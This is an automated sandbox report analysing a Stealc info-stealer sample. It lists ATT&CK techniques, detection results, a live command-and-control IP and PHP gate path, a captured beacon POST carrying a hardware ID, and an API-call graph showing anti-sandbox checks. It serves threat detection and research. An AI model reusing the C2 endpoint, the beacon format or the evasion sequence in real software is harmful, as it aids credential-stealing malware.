              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206d0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php:file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.phpzfile.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206dfile.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.206/c4becf79229cb002.phpEfile.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpvfile.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562673
                              Start date and time:2024-11-25 21:26:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 2s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 122
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.234.120.54
                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, ris-prod.trafficmanager.net, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.943565277107183
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'831'936 bytes
                              MD5:6487be67797f2ab4bcd902c3b34efe97
                              SHA1:6b4a7190c65c8c54c39e66fabab190afd36cb5fb
                              SHA256:bab41e3e4289d1b7d5785304cc05ba4acbb42b51d5d18053305b6bd19a77474a
                              SHA512:790db5f7a970c8528891b0524c30d6f85fea324cb7a87473bf309069daaa83bc0a6ad7aacf0e693890fbfc148649f7f06cb5062cac3f810f472fb4ca990e10ca
                              SSDEEP:49152:cTkgK5NjPRVdIMy6kSLSlU1V59PQ0VTashEI:ikP5NjPLCMy6CCPgsSI
                              TLSH:808533A25F31F12BD8A982F65A4E11FD6EBF0718A2A90FD90CC932559B33EC17514C27
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa9e000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007FB10CCFADAAh
                              psrld mm3, qword ptr [ebx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, ch
                              add byte ptr [eax], ah
                              add byte ptr [eax], al
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              inc eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x1620009382b56d0dd15be3105c84e1094b225unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x2b00x200f8a938b260e64f2424801bedf7c93b9cFalse0.80078125data6.065857070606265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x2ab0000x200874c08c5ac9bf01a319598be93708a34unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              vhjbpyvx0x4f70000x1a60000x1a560060e1f57e3e0c5be664a1d25e39629061False0.9944899974043311data7.952882497591057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              susocjsk0x69d0000x10000x40010bb90abb7fbd5efb26e0bca63557101False0.8232421875data6.347150191509316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x69e0000x30000x2200f0872884f3d3a2170f03185ce3337c86False0.060776654411764705DOS executable (COM)0.7186706726501075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x69c1ac0x256ASCII text, with CRLF line terminators0.5100334448160535

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-25T21:27:12.585325+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649717185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 25, 2024 21:27:10.615768909 CET4971780192.168.2.6185.215.113.206
                              Nov 25, 2024 21:27:10.739588976 CET8049717185.215.113.206192.168.2.6
                              Nov 25, 2024 21:27:10.739659071 CET4971780192.168.2.6185.215.113.206
                              Nov 25, 2024 21:27:10.740847111 CET4971780192.168.2.6185.215.113.206
                              Nov 25, 2024 21:27:10.860857010 CET8049717185.215.113.206192.168.2.6
                              Nov 25, 2024 21:27:12.075767994 CET8049717185.215.113.206192.168.2.6
                              Nov 25, 2024 21:27:12.075968027 CET4971780192.168.2.6185.215.113.206
                              Nov 25, 2024 21:27:12.142591953 CET4971780192.168.2.6185.215.113.206
                              Nov 25, 2024 21:27:12.263593912 CET8049717185.215.113.206192.168.2.6
                              Nov 25, 2024 21:27:12.585252047 CET8049717185.215.113.206192.168.2.6
                              Nov 25, 2024 21:27:12.585325003 CET4971780192.168.2.6185.215.113.206
                              Nov 25, 2024 21:27:14.570225000 CET4971780192.168.2.6185.215.113.206

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649717185.215.113.206803800C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 25, 2024 21:27:10.740847111 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 25, 2024 21:27:12.075767994 CET203INHTTP/1.1 200 OK
                              Date: Mon, 25 Nov 2024 20:27:11 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 25, 2024 21:27:12.142591953 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ
                              Host: 185.215.113.206
                              Content-Length: 210
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 39 43 33 42 36 37 41 44 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a
                              Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"CF9C3B67AD1C389561124------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"mars------HDAFIIDAKJDGDHIDAKJJ--
                              Nov 25, 2024 21:27:12.585252047 CET210INHTTP/1.1 200 OK
                              Date: Mon, 25 Nov 2024 20:27:12 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:15:27:07
                              Start date:25/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x6c0000
                              File size:1'831'936 bytes
                              MD5 hash:6487BE67797F2AB4BCD902C3B34EFE97
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.3%
                                Total number of Nodes:1407
                                Total number of Limit Nodes:28
                                execution_graph 27090 6d1269 408 API calls 27059 6c5869 57 API calls 27081 6e2d60 11 API calls 27099 6e2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27100 6ea280 __CxxFrameHandler 27070 6de0f9 140 API calls 27101 6d6b79 138 API calls 27095 6df2f8 93 API calls 27102 6c1b64 162 API calls 27114 6cbbf9 90 API calls 27061 6d4c77 295 API calls 25622 6e1bf0 25674 6c2a90 25622->25674 25626 6e1c03 25627 6e1c29 lstrcpy 25626->25627 25628 6e1c35 25626->25628 25627->25628 25629 6e1c6d GetSystemInfo 25628->25629 25630 6e1c65 ExitProcess 25628->25630 25631 6e1c7d ExitProcess 25629->25631 25632 6e1c85 25629->25632 25775 6c1030 GetCurrentProcess VirtualAllocExNuma 25632->25775 25637 6e1cb8 25787 6e2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25637->25787 25638 6e1ca2 25638->25637 25639 6e1cb0 ExitProcess 25638->25639 25641 6e1cbd 25642 6e1ce7 lstrlen 25641->25642 25996 6e2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25641->25996 25646 6e1cff 25642->25646 25644 6e1cd1 25644->25642 25649 6e1ce0 ExitProcess 25644->25649 25645 6e1d23 lstrlen 25647 6e1d39 25645->25647 25646->25645 25648 6e1d13 lstrcpy lstrcat 25646->25648 25650 6e1d5a 25647->25650 25651 6e1d46 lstrcpy lstrcat 25647->25651 25648->25645 25652 6e2ad0 3 API calls 25650->25652 25651->25650 25653 6e1d5f lstrlen 25652->25653 25656 6e1d74 25653->25656 25654 6e1d9a lstrlen 25655 6e1db0 25654->25655 25658 6e1dce 25655->25658 25659 6e1dba lstrcpy lstrcat 25655->25659 25656->25654 25657 6e1d87 lstrcpy lstrcat 25656->25657 25657->25654 25789 6e2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25658->25789 25659->25658 25661 6e1dd3 lstrlen 25662 6e1de7 25661->25662 25663 6e1df7 lstrcpy lstrcat 25662->25663 25664 6e1e0a 25662->25664 25663->25664 25665 6e1e28 lstrcpy 25664->25665 25666 6e1e30 25664->25666 25665->25666 25667 6e1e56 OpenEventA 25666->25667 25668 6e1e8c CreateEventA 25667->25668 25669 6e1e68 CloseHandle Sleep OpenEventA 25667->25669 25790 6e1b20 GetSystemTime 25668->25790 25669->25668 25669->25669 25673 6e1ea5 CloseHandle ExitProcess 25997 6c4a60 25674->25997 25676 6c2aa1 25677 6c4a60 2 API calls 25676->25677 25678 6c2ab7 25677->25678 25679 6c4a60 2 API calls 25678->25679 25680 6c2acd 25679->25680 25681 6c4a60 2 API calls 25680->25681 25682 6c2ae3 25681->25682 25683 6c4a60 2 API calls 25682->25683 25684 6c2af9 25683->25684 25685 6c4a60 2 API calls 25684->25685 25686 6c2b0f 25685->25686 25687 6c4a60 2 API calls 25686->25687 25688 6c2b28 25687->25688 25689 6c4a60 2 API calls 25688->25689 25690 6c2b3e 25689->25690 25691 6c4a60 2 API calls 25690->25691 25692 6c2b54 25691->25692 25693 6c4a60 2 API calls 25692->25693 25694 6c2b6a 25693->25694 25695 6c4a60 2 API calls 25694->25695 25696 6c2b80 25695->25696 25697 6c4a60 2 API calls 25696->25697 25698 6c2b96 25697->25698 25699 6c4a60 2 API calls 25698->25699 25700 6c2baf 25699->25700 25701 6c4a60 2 API calls 25700->25701 25702 6c2bc5 25701->25702 25703 6c4a60 2 API calls 25702->25703 25704 6c2bdb 25703->25704 25705 6c4a60 2 API calls 25704->25705 25706 6c2bf1 25705->25706 25707 6c4a60 2 API calls 25706->25707 25708 6c2c07 25707->25708 25709 6c4a60 2 API calls 25708->25709 25710 6c2c1d 25709->25710 25711 6c4a60 2 API calls 25710->25711 25712 6c2c36 25711->25712 25713 6c4a60 2 API calls 25712->25713 25714 6c2c4c 25713->25714 25715 6c4a60 2 API calls 25714->25715 25716 6c2c62 25715->25716 25717 6c4a60 2 API calls 25716->25717 25718 6c2c78 25717->25718 25719 6c4a60 2 API calls 25718->25719 25720 6c2c8e 25719->25720 25721 6c4a60 2 API calls 25720->25721 25722 6c2ca4 25721->25722 25723 6c4a60 2 API calls 25722->25723 25724 6c2cbd 25723->25724 25725 6c4a60 2 API calls 25724->25725 25726 6c2cd3 25725->25726 25727 6c4a60 2 API calls 25726->25727 25728 6c2ce9 25727->25728 25729 6c4a60 2 API calls 25728->25729 25730 6c2cff 25729->25730 25731 6c4a60 2 API calls 25730->25731 25732 6c2d15 25731->25732 25733 6c4a60 2 API calls 25732->25733 25734 6c2d2b 25733->25734 25735 6c4a60 2 API calls 25734->25735 25736 6c2d44 25735->25736 25737 6c4a60 2 API calls 25736->25737 25738 6c2d5a 25737->25738 25739 6c4a60 2 API calls 25738->25739 25740 6c2d70 25739->25740 25741 6c4a60 2 API calls 25740->25741 25742 6c2d86 25741->25742 25743 6c4a60 2 API calls 25742->25743 25744 6c2d9c 25743->25744 25745 6c4a60 2 API calls 25744->25745 25746 6c2db2 25745->25746 25747 6c4a60 2 API calls 25746->25747 25748 6c2dcb 25747->25748 25749 6c4a60 2 API calls 25748->25749 25750 6c2de1 25749->25750 25751 6c4a60 2 API calls 25750->25751 25752 6c2df7 25751->25752 25753 6c4a60 2 API calls 25752->25753 25754 6c2e0d 25753->25754 25755 6c4a60 2 API calls 25754->25755 25756 6c2e23 25755->25756 25757 6c4a60 2 API calls 25756->25757 25758 6c2e39 25757->25758 25759 6c4a60 2 API calls 25758->25759 25760 6c2e52 25759->25760 25761 6e6390 GetPEB 25760->25761 25762 6e65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25761->25762 25763 6e63c3 25761->25763 25764 6e6638 25762->25764 25765 6e6625 GetProcAddress 25762->25765 25770 6e63d7 20 API calls 25763->25770 25766 6e666c 25764->25766 25767 6e6641 GetProcAddress GetProcAddress 25764->25767 25765->25764 25768 6e6688 25766->25768 25769 6e6675 GetProcAddress 25766->25769 25767->25766 25771 6e66a4 25768->25771 25772 6e6691 GetProcAddress 25768->25772 25769->25768 25770->25762 25773 6e66ad GetProcAddress GetProcAddress 25771->25773 25774 6e66d7 25771->25774 25772->25771 25773->25774 25774->25626 25776 6c105e VirtualAlloc 25775->25776 25777 6c1057 ExitProcess 25775->25777 25778 6c107d 25776->25778 25779 6c108a VirtualFree 25778->25779 25780 6c10b1 25778->25780 25779->25780 25781 6c10c0 25780->25781 25782 6c10d0 GlobalMemoryStatusEx 25781->25782 25784 6c10f5 25782->25784 25785 6c1112 ExitProcess 25782->25785 25784->25785 25786 6c111a GetUserDefaultLangID 25784->25786 25786->25637 25786->25638 25788 6e2b24 25787->25788 25788->25641 25789->25661 26002 6e1820 25790->26002 25792 6e1b81 sscanf 26041 6c2a20 25792->26041 25795 6e1be9 25798 6dffd0 25795->25798 25796 6e1bd6 25796->25795 25797 6e1be2 ExitProcess 25796->25797 25799 6dffe0 25798->25799 25800 6e000d lstrcpy 25799->25800 25801 6e0019 lstrlen 25799->25801 25800->25801 25802 6e00d0 25801->25802 25803 6e00db lstrcpy 25802->25803 25804 6e00e7 lstrlen 25802->25804 25803->25804 25805 6e00ff 25804->25805 25806 6e010a lstrcpy 25805->25806 25807 6e0116 lstrlen 25805->25807 25806->25807 25808 6e012e 25807->25808 25809 6e0139 lstrcpy 25808->25809 25810 6e0145 25808->25810 25809->25810 26043 6e1570 25810->26043 25813 6e016e 25814 6e018f lstrlen 25813->25814 25815 6e0183 lstrcpy 25813->25815 25816 6e01a8 25814->25816 25815->25814 25817 6e01bd lstrcpy 25816->25817 25818 6e01c9 lstrlen 25816->25818 25817->25818 25819 